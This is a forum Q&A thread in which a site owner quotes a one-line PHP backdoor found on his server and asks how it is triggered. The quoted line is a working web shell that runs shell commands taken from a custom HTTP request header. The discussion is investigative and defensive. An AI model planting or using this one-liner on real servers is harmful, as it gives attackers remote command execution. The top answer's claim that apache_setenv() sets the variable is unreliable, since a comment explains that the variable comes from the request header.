# PHP Backdoor code

Tags: php, apache-2.2, hacking, setenv

I've found a php backdoor on my host.

```
<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>
```

I see requests in access log to that php file were POST requests, but I don't know 
how the SETENV of that variable was set; could someone explain how such variable can
be set and if possible where can I limit/disable setting such variables on server side.

thanks

-H.

Comment: Are you merely investigating this, or do you need to close a security hole by patching the code?

Comment: @Hrvoje - sorry, this question should never have been migrated here. This is a question about php and security, so if it belongs anywhere on the network it would be at security.se

Comment: im investigating yes; trying to understand how things work; I've put it to coders site but they moved it to server fault ... gah

Comment: HTTP_ACCEPT_TROLOLO is automatically set by PHP  & apache if there's an Accept-Trololo header. you may detect this header for removal with mod-security but the real problem is the presence of the PHP script (as another legacy header could be used)

Answer (score 1):

it was set by [`apache_setenv();`](http://php.net/apache_setenv)

Search for

```
apache_setenv("HTTP_ACCEPT_TROL
```

or

```
apache_setenv('HTTP_ACCEPT_TROL
```

and you'll find your answer

Comment: that may be so; but I see now way how that could be done remotely; hence what is use of backdoor if you can't use it remotely?

Comment: " and '    ... it can be both

Comment: you would maybe get way by telling us that apache env

Comment: This question is clearly off topic (it's not programming related in any sense and belongs on serverfault). Please don't answer such questions; it encourages others to post similar off topic questions and clutters the site, making it less effective as a resource. With 5K+ rep, you should be familiar with what's on topic and what's not; if you're not, please read the [FAQ](http://stackoverflow.com/faq) so that you are more so. Thanks. :)

Comment: @KenWhite: His question contains PHP code, and it maybe does (not necessary though) belongs to serverfault. It could be just phpcode, or server-side implemention. Nobody knows